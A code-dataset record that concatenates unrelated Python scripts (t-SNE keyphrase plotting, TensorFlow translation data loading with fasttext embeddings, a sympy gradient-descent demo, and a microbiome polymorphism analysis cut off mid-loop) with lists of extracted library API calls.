find_copy = True else: wordlist.append(idx2word[w_index].encode('utf-8')) if find_copy: # print('Find copy! - %s - %s' % (' '.join(wordlist), str(sample_index))) wordlist = None return wordlist def phrase_scatter(x, labels): # # We create a scatter plot. f = plt.figure(figsize=(20, 20)) for label, x, y in zip(labels, x[:, 0], x[:, 1]): plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points') plt.scatter(x, y, lw=0, s=40, c='black') plt.savefig(config['predict_path']+'/ir_phrase_tsne-generated.png', dpi=120) plt.show() def plot_phrase_vectors(): phrase_dict = {} for doc, prediction_list, score_list, encoding_list in zip(docs, predictions, scores, output_encodings): # print('*' * 50) # print(doc['name'] + ' - ' + doc['title']) doc['book_id'] = doc['name'][:doc['name'].index('_')] number_to_keep = 10 for prediction, score, encoding in zip(prediction_list, score_list, encoding_list): predicted_word = cut_zero(prediction, idx2word) if predicted_word == None: continue # if len(predicted_word)==1: # continue if ' '.join(predicted_word) not in phrase_dict: phrase_dict[' '.join(predicted_word)] = {'score':score, 'encoding':encoding, 'word':' '.join(predicted_word), 'times':1} else: if score < phrase_dict[' '.join(predicted_word)]['score']: phrase_dict[' '.join(predicted_word)]['score'] = score phrase_dict[' '.join(predicted_word)]['encoding'] = encoding phrase_dict[' '.join(predicted_word)]['times']+=1 number_to_keep -= 1 if number_to_keep == 0: break for p in phrase_dict.values(): p['score']/=p['times'] K = 200 p_list = sorted(phrase_dict.values(), key=lambda x:x['score']) #[:K] print('#(phrase)=%d' % len(phrase_dict)) X = np.asarray([phrase['encoding'] for phrase in p_list]) label = np.asarray([phrase['word'] for phrase in p_list]) model = TSNE(n_components=2, random_state=0) np.set_printoptions(suppress=True) digits_proj = model.fit_transform(X) phrase_scatter(digits_proj, label) if __name__=='__main__': config = setup_keyphrase_all() # load settings. loader = testing_data_loader('irbooks', kwargs=dict(basedir=config['path'])) docs = loader.get_docs(return_dict=True) train_set, validation_set, test_sets, idx2word, word2idx = deserialize_from_file(config['dataset']) test_sets = keyphrase_test_dataset.load_additional_testing_data(config['testing_datasets'], idx2word, word2idx, config, postagging=False) test_set, test_s_list, test_t_list, test_s_o_list, test_t_o_list, input_encodings, predictions, scores, output_encodings, idx2word \ = deserialize_from_file(config['predict_path'] + 'predict.{0}.{1}.pkl'.format(config['predict_type'], 'irbooks')) book_name_id = {} # plot_phrase_vectors() plot_chapter_vectors()
[ "seaborn.set_style", "numpy.set_printoptions", "matplotlib.pyplot.show", "sklearn.manifold.TSNE", "keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data", "matplotlib.pyplot.annotate", "matplotlib.pyplot.scatter", "numpy.asarray", "emolga.dataset.build_dataset.deserialize_from_file", "matplotlib.pyplot.figure", "seaborn.color_palette", "seaborn.set_palette", "seaborn.set_context", "matplotlib.pyplot.savefig" ]
[((489, 514), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (502, 514), True, 'import seaborn as sns\n'), ((515, 539), 'seaborn.set_palette', 'sns.set_palette', (['"""muted"""'], {}), "('muted')\n", (530, 539), True, 'import seaborn as sns\n'), ((540, 612), 'seaborn.set_context', 'sns.set_context', (['"""notebook"""'], {'font_scale': '(1.5)', 'rc': "{'lines.linewidth': 2.5}"}), "('notebook', font_scale=1.5, rc={'lines.linewidth': 2.5})\n", (555, 612), True, 'import seaborn as sns\n'), ((668, 726), 'numpy.asarray', 'np.asarray', (["[book_name_id[doc['book_id']] for doc in docs]"], {}), "([book_name_id[doc['book_id']] for doc in docs])\n", (678, 726), True, 'import numpy as np\n'), ((869, 897), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (879, 897), True, 'import matplotlib.pyplot as plt\n'), ((2526, 2611), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_sections_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_sections_tsne-generated.png', dpi=120\n )\n", (2537, 2611), True, 'import matplotlib.pyplot as plt\n'), ((2609, 2619), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2617, 2619), True, 'import matplotlib.pyplot as plt\n'), ((3270, 3323), 'numpy.asarray', 'np.asarray', (["[doc['forward_encoding'] for doc in docs]"], {}), "([doc['forward_encoding'] for doc in docs])\n", (3280, 3323), True, 'import numpy as np\n'), ((3336, 3372), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (3340, 3372), False, 'from sklearn.manifold import TSNE\n'), ((3377, 3411), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (3396, 3411), True, 'import numpy as np\n'), ((4327, 4355), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (4337, 4355), True, 'import matplotlib.pyplot as plt\n'), ((4547, 4625), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_phrase_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_phrase_tsne-generated.png', dpi=120)\n", (4558, 4625), True, 'import matplotlib.pyplot as plt\n'), ((4628, 4638), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4636, 4638), True, 'import matplotlib.pyplot as plt\n'), ((6067, 6120), 'numpy.asarray', 'np.asarray', (["[phrase['encoding'] for phrase in p_list]"], {}), "([phrase['encoding'] for phrase in p_list])\n", (6077, 6120), True, 'import numpy as np\n'), ((6133, 6182), 'numpy.asarray', 'np.asarray', (["[phrase['word'] for phrase in p_list]"], {}), "([phrase['word'] for phrase in p_list])\n", (6143, 6182), True, 'import numpy as np\n'), ((6195, 6231), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (6199, 6231), False, 'from sklearn.manifold import TSNE\n'), ((6236, 6270), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (6255, 6270), True, 'import numpy as np\n'), ((6624, 6664), 'emolga.dataset.build_dataset.deserialize_from_file', 'deserialize_from_file', (["config['dataset']"], {}), "(config['dataset'])\n", (6645, 6664), False, 'from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file\n'), ((6681, 6811), 'keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data', 'keyphrase_test_dataset.load_additional_testing_data', (["config['testing_datasets']", 'idx2word', 'word2idx', 'config'], {'postagging': '(False)'}), "(config[\n 'testing_datasets'], idx2word, word2idx, config, postagging=False)\n", (6732, 6811), False, 'from keyphrase.dataset import keyphrase_test_dataset\n'), ((796, 824), 'seaborn.color_palette', 'sns.color_palette', (['"""hls"""', '(10)'], {}), "('hls', 10)\n", (813, 824), True, 'import seaborn as sns\n'), ((2400, 2473), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (2412, 2473), True, 'import matplotlib.pyplot as plt\n'), ((2482, 2520), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': 'color'}), '(x, y, lw=0, s=40, c=color)\n', (2493, 2520), True, 'import matplotlib.pyplot as plt\n'), ((4419, 4492), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (4431, 4492), True, 'import matplotlib.pyplot as plt\n'), ((4501, 4541), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': '"""black"""'}), "(x, y, lw=0, s=40, c='black')\n", (4512, 4541), True, 'import matplotlib.pyplot as plt\n')]
import os import typing import pickle import fasttext import numpy as np import tensorflow as tf from utils import text_preprocessing from utils import logging logger = logging.getLogger() PADDING_TOKEN = '<pad>' UNKNOWN_TOKEN = '<unk>' SAVED_MODEL_DIR = 'saved_model' SHARED_PATH = '/project/cq-training-1/project2/teams/team12/' MAX_SEQ_LEN = 134 # Maximum sequence length of the aligned data aligned_data = None back_translated_data = None def create_folder(path: str): """ This function creates a folder if it does not already exists.""" if not os.path.exists(path): os.mkdir(path) def save_model(model: tf.keras.Model, name: str = None): """ This function saves the model to disk.""" create_folder(SAVED_MODEL_DIR) if name: model_path = os.path.join(SAVED_MODEL_DIR, name) else: model_path = os.path.join(SAVED_MODEL_DIR, model.get_name()) create_folder(model_path) model.save_weights(os.path.join(model_path, "model")) def save_metrics(metrics, name): """Save metrics to disk""" path = os.path.join(SAVED_MODEL_DIR, name) pickle.dump(metrics, open(os.path.join(path, 'metrics.pkl'), 'wb')) def create_fasttext_embedding_matrix(file_path: str, vocab: typing.Dict[str, int], embedding_dim: int) -> typing.Dict[str, np.ndarray]: """Train a fasttext model and return the embeddings.""" model_path = os.path.join(SHARED_PATH, 'embedding_models', f'fasttext_model_dim_{embedding_dim}.bin') if os.path.exists(model_path): logger.info('Loading fasttext embeddings...') model = fasttext.load_model(model_path) else: logger.info('Training fasttext embeddings...') model = fasttext.train_unsupervised(file_path, model='skipgram', dim=embedding_dim) model.save_model(model_path) embedding_matrix = np.zeros((len(vocab), model.get_dimension())) for word in vocab.keys(): idx = vocab[word] if word in model.words: embedding_matrix[idx] = model[word] else: pass # If word embedding is unknown, vector of zeros return embedding_matrix def create_vocab(file_path: str, vocab_size: int) -> typing.Dict[str, np.ndarray]: """Returns a dictionary that maps words to one hot embeddings""" # Get sentences sentences = get_sentences(file_path) # Get words words = [] for sentence in sentences: words.extend(sentence) # Get unique words unique_words, word_counts = np.unique(words, return_counts=True) sorted_unique_words = unique_words[np.argsort(word_counts)[::-1]] if vocab_size is None: vocab_size = len(sorted_unique_words) if vocab_size > len(sorted_unique_words): vocab_size = len(sorted_unique_words) logger.info(f"vocab_size is too big. Using vocab_size = {vocab_size} ") # Build vocabulary word2idx = {word: i + 1 for i, word in enumerate(sorted_unique_words[:vocab_size])} word2idx[PADDING_TOKEN] = 0 word2idx[UNKNOWN_TOKEN] = vocab_size + 1 idx2word = {i + 1: word for i, word in enumerate(sorted_unique_words[:vocab_size])} idx2word[0] = PADDING_TOKEN idx2word[vocab_size + 1] = UNKNOWN_TOKEN return word2idx, idx2word def get_sentences(file_path: str) -> typing.List[typing.List[str]]: """Reads file and returns the sentences.""" # Read file lines with open(file_path, 'r') as f: lines = f.readlines() # Split on words sentences = [] for line in lines: line = text_preprocessing.process(line) sentence = line.split() if len(sentence) > MAX_SEQ_LEN: sentence = sentence[:MAX_SEQ_LEN] sentences.append(sentence) return sentences def sort(x, y=None): """ Sort data according to len when using dynamic seq_len for efficient batching.""" idx = np.argsort([len(ip) for ip in x])[::-1] if y == None: return x[idx] return x[idx], y[idx] def load_data(path: str, vocab: typing.Dict[str, np.ndarray], seq_len: int = None) -> np.ndarray: def sentence_to_vocab(sentences, vocab): data = [] for i in range(len(sentences)): sentence = [] for j in range(len(sentences[i])): if seq_len is not None and j >= seq_len: break if sentences[i][j] in vocab: sentence.append(vocab[sentences[i][j]]) else: sentence.append(vocab[UNKNOWN_TOKEN]) data.append(np.array(sentence)) return np.array(data) sentences = get_sentences(path) data = sentence_to_vocab(sentences, vocab) return data def load_training_data(en_path: str, fr_path: str, vocab_en: typing.Dict[str, np.ndarray], vocab_fr: typing.Dict[str, np.ndarray], seq_len: int, batch_size: int, valid_ratio: float = 0.15, fr_unaligned_path: str = None, en_back_translated_path: str = None, back_translation_ratio: float = 1.0) -> typing.Tuple[tf.data.Dataset, tf.data.Dataset]: """Returns train and valid datasets""" # Global variables that hold the data to avoid reloading it multiple times when doing back-translation # (We load a new training set each epoch when doing back-translation) global aligned_data global back_translated_data # Build training data if aligned_data is None: train_X = load_data(en_path, vocab_en, seq_len) train_y = load_data(fr_path, vocab_fr, seq_len) aligned_data = (train_X, train_y) else: train_X, train_y = aligned_data # Split in train and valid cuttoff_idx = int(np.round(len(train_X) * (1 - valid_ratio))) train_X, valid_X = train_X[:cuttoff_idx], train_X[cuttoff_idx:] train_y, valid_y = train_y[:cuttoff_idx], train_y[cuttoff_idx:] logger.debug(f'shape train_X : {train_X.shape}') logger.debug(f'shape train_y : {train_y.shape}') # Load back-translated data if available if fr_unaligned_path is not None and en_back_translated_path is not None: if back_translated_data is None: back_translated_X = load_data(en_back_translated_path, vocab_en, seq_len) unaligned_y = load_data(fr_unaligned_path, vocab_fr, seq_len) back_translated_data = (back_translated_X, unaligned_y) else: back_translated_X, unaligned_y = back_translated_data # Sample data according to back translation ratio nb_examples = int(len(train_X) * back_translation_ratio) sample = np.random.randint(0, len(back_translated_X), nb_examples) back_translated_X = back_translated_X[sample] unaligned_y = unaligned_y[sample] train_X = np.concatenate((train_X, back_translated_X), axis=0) train_y = np.concatenate((train_y, unaligned_y), axis=0) logger.debug(f'shape train_X : {train_X.shape}') logger.debug(f'shape train_y : {train_y.shape}') if not seq_len: train_X, train_y = sort(train_X, train_y) valid_X, valid_y = sort(valid_X, valid_y) train_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(train_X, train_y)], output_types={'inputs':tf.int64, 'labels':tf.int64}, output_shapes={'inputs':tf.TensorShape([None]), 'labels':tf.TensorShape([None])})\ .shuffle(batch_size*3)\ .padded_batch(batch_size, drop_remainder=False, padded_shapes={'inputs':[seq_len], 'labels':[seq_len]}) valid_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(valid_X, valid_y)], output_types={'inputs':tf.int64, 'labels':tf.int64}, output_shapes={'inputs':tf.TensorShape([None]), 'labels':tf.TensorShape([None])}) \ .padded_batch(batch_size, drop_remainder=False, padded_shapes={'inputs':[seq_len], 'labels':[seq_len]}) return train_dataset, valid_dataset, len(train_y), len(valid_y) def generate_sentence(indices: typing.List[int], vocab: typing.Dict[int, str], ignore_unknown: bool = True) -> str: """Generate a sentence from a list of indices.""" sentence = '' for idx in indices: if int(idx) not in vocab: print(f'idx {idx} not in vocab') continue elif vocab[idx] == PADDING_TOKEN \ or vocab[idx] == text_preprocessing.BOS: continue elif vocab[idx] == text_preprocessing.EOS: break sentence += vocab[int(idx)] sentence += ' ' sentence = text_preprocessing.recapitalize(sentence) return sentence def generate_sentence_from_probabilities(probs: typing.List[np.ndarray], vocab: typing.Dict[int, str], ignore_unknown: bool = True) -> str: """Generate a sentence from a list of probability vector.""" indices = np.argmax(probs, axis=1).astype('int') sentence = '' for i, idx in enumerate(indices): if int(idx) not in vocab: print(f'idx {idx} not in vocab') continue if vocab[idx] == UNKNOWN_TOKEN and ignore_unknown: idx = int(np.argsort(probs[i])[-2]) # Take the second biggest prob if vocab[idx] == PADDING_TOKEN \ or vocab[idx] == text_preprocessing.BOS: continue elif vocab[idx] == text_preprocessing.EOS: break sentence += vocab[int(idx)] sentence += ' ' sentence = text_preprocessing.recapitalize(sentence) return sentence # Code from : https://www.tensorflow.org/tutorials/text/transformer class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): """Custom learning rate scheduler for the transformer.""" def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps**-1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)
[ "os.mkdir", "os.path.join", "numpy.concatenate", "numpy.argmax", "fasttext.train_unsupervised", "os.path.exists", "utils.text_preprocessing.process", "tensorflow.TensorShape", "numpy.argsort", "tensorflow.cast", "fasttext.load_model", "numpy.array", "utils.text_preprocessing.recapitalize", "utils.logging.getLogger", "tensorflow.math.minimum", "numpy.unique", "tensorflow.math.rsqrt" ]
[((172, 191), 'utils.logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (189, 191), False, 'from utils import logging\n'), ((1067, 1102), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (1079, 1102), False, 'import os\n'), ((1428, 1520), 'os.path.join', 'os.path.join', (['SHARED_PATH', '"""embedding_models"""', 'f"""fasttext_model_dim_{embedding_dim}.bin"""'], {}), "(SHARED_PATH, 'embedding_models',\n f'fasttext_model_dim_{embedding_dim}.bin')\n", (1440, 1520), False, 'import os\n'), ((1525, 1551), 'os.path.exists', 'os.path.exists', (['model_path'], {}), '(model_path)\n', (1539, 1551), False, 'import os\n'), ((2529, 2565), 'numpy.unique', 'np.unique', (['words'], {'return_counts': '(True)'}), '(words, return_counts=True)\n', (2538, 2565), True, 'import numpy as np\n'), ((9287, 9328), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (9318, 9328), False, 'from utils import text_preprocessing\n'), ((10248, 10289), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (10279, 10289), False, 'from utils import text_preprocessing\n'), ((564, 584), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (578, 584), False, 'import os\n'), ((594, 608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (602, 608), False, 'import os\n'), ((787, 822), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (799, 822), False, 'import os\n'), ((955, 988), 'os.path.join', 'os.path.join', (['model_path', '"""model"""'], {}), "(model_path, 'model')\n", (967, 988), False, 'import os\n'), ((1623, 1654), 'fasttext.load_model', 'fasttext.load_model', (['model_path'], {}), '(model_path)\n', (1642, 1654), False, 'import fasttext\n'), ((1736, 1811), 'fasttext.train_unsupervised', 'fasttext.train_unsupervised', (['file_path'], {'model': '"""skipgram"""', 'dim': 'embedding_dim'}), "(file_path, model='skipgram', dim=embedding_dim)\n", (1763, 1811), False, 'import fasttext\n'), ((3550, 3582), 'utils.text_preprocessing.process', 'text_preprocessing.process', (['line'], {}), '(line)\n', (3576, 3582), False, 'from utils import text_preprocessing\n'), ((4589, 4603), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4597, 4603), True, 'import numpy as np\n'), ((6929, 6981), 'numpy.concatenate', 'np.concatenate', (['(train_X, back_translated_X)'], {'axis': '(0)'}), '((train_X, back_translated_X), axis=0)\n', (6943, 6981), True, 'import numpy as np\n'), ((7000, 7046), 'numpy.concatenate', 'np.concatenate', (['(train_y, unaligned_y)'], {'axis': '(0)'}), '((train_y, unaligned_y), axis=0)\n', (7014, 7046), True, 'import numpy as np\n'), ((10671, 10704), 'tensorflow.cast', 'tf.cast', (['self.d_model', 'tf.float32'], {}), '(self.d_model, tf.float32)\n', (10678, 10704), True, 'import tensorflow as tf\n'), ((10793, 10812), 'tensorflow.math.rsqrt', 'tf.math.rsqrt', (['step'], {}), '(step)\n', (10806, 10812), True, 'import tensorflow as tf\n'), ((1133, 1166), 'os.path.join', 'os.path.join', (['path', '"""metrics.pkl"""'], {}), "(path, 'metrics.pkl')\n", (1145, 1166), False, 'import os\n'), ((2605, 2628), 'numpy.argsort', 'np.argsort', (['word_counts'], {}), '(word_counts)\n', (2615, 2628), True, 'import numpy as np\n'), ((9653, 9677), 'numpy.argmax', 'np.argmax', (['probs'], {'axis': '(1)'}), '(probs, axis=1)\n', (9662, 9677), True, 'import numpy as np\n'), ((10877, 10904), 'tensorflow.math.rsqrt', 'tf.math.rsqrt', (['self.d_model'], {}), '(self.d_model)\n', (10890, 10904), True, 'import tensorflow as tf\n'), ((10907, 10934), 'tensorflow.math.minimum', 'tf.math.minimum', (['arg1', 'arg2'], {}), '(arg1, arg2)\n', (10922, 10934), True, 'import tensorflow as tf\n'), ((4554, 4572), 'numpy.array', 'np.array', (['sentence'], {}), '(sentence)\n', (4562, 4572), True, 'import numpy as np\n'), ((9929, 9949), 'numpy.argsort', 'np.argsort', (['probs[i]'], {}), '(probs[i])\n', (9939, 9949), True, 'import numpy as np\n'), ((8283, 8305), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8297, 8305), True, 'import tensorflow as tf\n'), ((8375, 8397), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8389, 8397), True, 'import tensorflow as tf\n'), ((7575, 7597), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7589, 7597), True, 'import tensorflow as tf\n'), ((7675, 7697), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7689, 7697), True, 'import tensorflow as tf\n')]
import matplotlib.pyplot as plt from sympy import symbols,diff #from mpl_toolkits.mplot3d.axes3d import Axes3D from matplotlib import cm import numpy as np def f(x,y): r=3**(-x*x -y*y) return 1/(r+1) def doFit(): a, b = symbols('x, y') multiplier = 0.1 max_iter = 900 params = np.array([-3.0, 1.0]) print("DiffX = ",diff(f(a, b), a)) print("DiffX = ", diff(f(a, b), b)) for n in range(max_iter): gradient_x = diff(f(a, b), a).evalf(subs={a: params[0], b: params[1]}) gradient_y = diff(f(a, b), b).evalf(subs={a: params[0], b: params[1]}) gradients = np.array([gradient_x, gradient_y]) params = params - multiplier * gradients print("Gardients = ", gradients) print("Params = ", params) print("Function at min = ", f(params[0], params[1])) error=0.00001 x=np.linspace(start=-2,stop=2,num=200) y=np.linspace(start=-2,stop=2,num=200) x,y=np.meshgrid(x,y) print(x,y) doFit() fig=plt.figure(figsize=(16,12)) ax=fig.gca(projection='3d') ax.set_xlabel("X",fontsize=20) ax.set_ylabel("Y",fontsize=20) ax.set_zlabel("Z",fontsize=20) ax.plot_surface(x,y,f(x,y),cmap=cm.hot,alpha=0.5) plt.show()
[ "sympy.symbols", "numpy.meshgrid", "matplotlib.pyplot.show", "matplotlib.pyplot.figure", "numpy.array", "numpy.linspace" ]
[((838, 876), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (849, 876), True, 'import numpy as np\n'), ((877, 915), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (888, 915), True, 'import numpy as np\n'), ((918, 935), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (929, 935), True, 'import numpy as np\n'), ((958, 986), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(16, 12)'}), '(figsize=(16, 12))\n', (968, 986), True, 'import matplotlib.pyplot as plt\n'), ((1157, 1167), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1165, 1167), True, 'import matplotlib.pyplot as plt\n'), ((234, 249), 'sympy.symbols', 'symbols', (['"""x, y"""'], {}), "('x, y')\n", (241, 249), False, 'from sympy import symbols, diff\n'), ((303, 324), 'numpy.array', 'np.array', (['[-3.0, 1.0]'], {}), '([-3.0, 1.0])\n', (311, 324), True, 'import numpy as np\n'), ((612, 646), 'numpy.array', 'np.array', (['[gradient_x, gradient_y]'], {}), '([gradient_x, gradient_y])\n', (620, 646), True, 'import numpy as np\n')]
from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils import pylab, sys, numpy as np, random, math from utils import temporal_changes_utils from collections import defaultdict import bz2 import pickle adir = config.analysis_directory ddir = config.data_directory pdir = "%s/pickles" % config.data_directory # Load species list good_species_list = parse_midas_data.load_pickled_good_species_list() # ================================================================= # Load QP, polymorphism, alpha diversity info sample_species_qp_dict = pickle.load(open("%s/sample_species_qp_dict.pkl" % pdir, 'rb')) num_qp_dict = pickle.load(open("%s/plot_qp/num_qp_dict_binned.pkl" % pdir, 'rb')) num_non_dict = pickle.load(open("%s/plot_qp/num_non_dict_binned.pkl" % pdir, 'rb')) num_lowcov_dict = pickle.load(open("%s/plot_qp/num_lowcov_dict_binned.pkl" % pdir, 'rb')) sample_species_polymorphism_dict = pickle.load(open("%s/sample_species_polymorphism_dict.pkl" % (pdir), 'rb')) alpha_div_dict = pickle.load(open("%s/alpha_div_dict.pkl" % pdir, 'rb')) # ================================================================= # ================================================================= # Load polymorphism (common and rare pS) info sample_species_common_pS_dict = defaultdict(dict) sample_species_rare_pS_dict = defaultdict(dict) sample_species_seg_pS_dict = defaultdict(dict) type, type_desc = 'common', '0.2-0.5' within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb')) within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb')) for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]: for sample in within_total_sites_dict: for species in within_total_sites_dict[sample]: w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species] # Fraction of all synonymous sites with minor allele frequency > 0.05 sample_species_common_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0) type, type_desc = 'rare', '0-0.05 (excl. 0)' within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb')) within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb')) for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]: for sample in within_total_sites_dict: for species in within_total_sites_dict[sample]: w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species] # Fraction of all synonymous sites with minor allele frequency > 0.05 sample_species_rare_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0) type, type_desc = 'seg', '>0' within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb')) within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb')) for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]: for sample in within_total_sites_dict: for species in within_total_sites_dict[sample]: w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species] # Fraction of all synonymous sites with minor allele frequency > 0.05 sample_species_seg_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0) if sample_species_seg_pS_dict[sample][species] > 0.7: print(sample + ", " + species) print(within_total_sites_dict[sample][species]) # ================================================================= # QP: aggregate over species for each timepoint mi_tp_sample_dict, infant_tps_ordered = su.get_mi_tp_sample_dict(exclude_cohorts = ['olm'], binned = True) mother_tps_ordered = sorted(mi_tp_sample_dict['mother'].keys()) tps_ordered_dict = {'mother': mother_tps_ordered, 'infant': infant_tps_ordered} num_qp_agg_species = {'infant': [], 'mother': []} num_non_agg_species = {'infant': [], 'mother': []} num_lowcov_agg_species = {'infant': [], 'mother': []} for cat in ['mother', 'infant']: for tp in tps_ordered_dict[cat]: if len(mi_tp_sample_dict[cat][tp]) < 10: continue # Skip timepoints with not enough data total_num_qp, total_num_non, total_num_lowcov = 0, 0, 0 for species in good_species_list: total_num_qp += num_qp_dict[cat][species][tp] total_num_non += num_non_dict[cat][species][tp] total_num_lowcov += num_lowcov_dict[cat][species][tp] num_qp_agg_species[cat].append(total_num_qp) num_non_agg_species[cat].append(total_num_non) num_lowcov_agg_species[cat].append(total_num_lowcov) # QP: Get proportion QP for each sample num_qp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)} num_nonqp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)} for cat in ['mother', 'infant']: for sample in sample_species_qp_dict[cat]: for species in sample_species_qp_dict[cat][sample]: qp_status = sample_species_qp_dict[cat][sample][species] if qp_status == 'qp': num_qp_sample[cat][sample] += 1 if qp_status == 'non-qp': num_nonqp_sample[cat][sample] += 1 prop_nonqp_sample = {'infant': [], 'mother': []} for cat in ['mother', 'infant']: for tp in tps_ordered_dict[cat]: num_samples = len(mi_tp_sample_dict[cat][tp]) if num_samples < 10: continue # Skip timepoints with not enough data prop_nonqp_sample_tp = [] for sample in mi_tp_sample_dict[cat][tp]: if sample in num_qp_sample[cat]: num_qp = num_qp_sample[cat][sample] num_nonqp = num_nonqp_sample[cat][sample] num_highcov = num_qp + num_nonqp if num_highcov >= 3: prop_nonqp = float(num_nonqp) / num_highcov prop_nonqp_sample_tp.append(prop_nonqp) else: print("%s: Not enough high coverage species!" % sample) prop_nonqp_sample[cat].append(prop_nonqp_sample_tp) # Plot time! import numpy as np from matplotlib import pyplot as plt # ======================================================================= # Alpha diversity boxplot (all non-Olm infants) on top # QP proportion on bottom # ======================================================================= alpha_divs = [] # list of sample values for each tp common_pSs = [] # list of sample values for each tp rare_pSs = [] # list of sample values for each tp seg_pSs = [] # list of sample values for each tp labels = ['M:-3m', 'M:dlv', 'M:1d', 'M:2d', 'M:3m'] for i in range(len(mother_tps_ordered)): tp = mother_tps_ordered[i] num_samples = len(mi_tp_sample_dict['mother'][tp]) if num_samples < 10: continue # Skip timepoints with not enough data labels[i] += ("\nn=%i" % num_samples) alpha_divs_tp = [] common_pSs_tp = [] rare_pSs_tp = [] seg_pSs_tp = [] for sample in mi_tp_sample_dict['mother'][tp]: alpha_divs_tp.append(alpha_div_dict[sample]) common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]] rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]] seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]] alpha_divs.append(alpha_divs_tp) common_pSs.append(common_pSs_tp) rare_pSs.append(rare_pSs_tp) seg_pSs.append(seg_pSs_tp) for 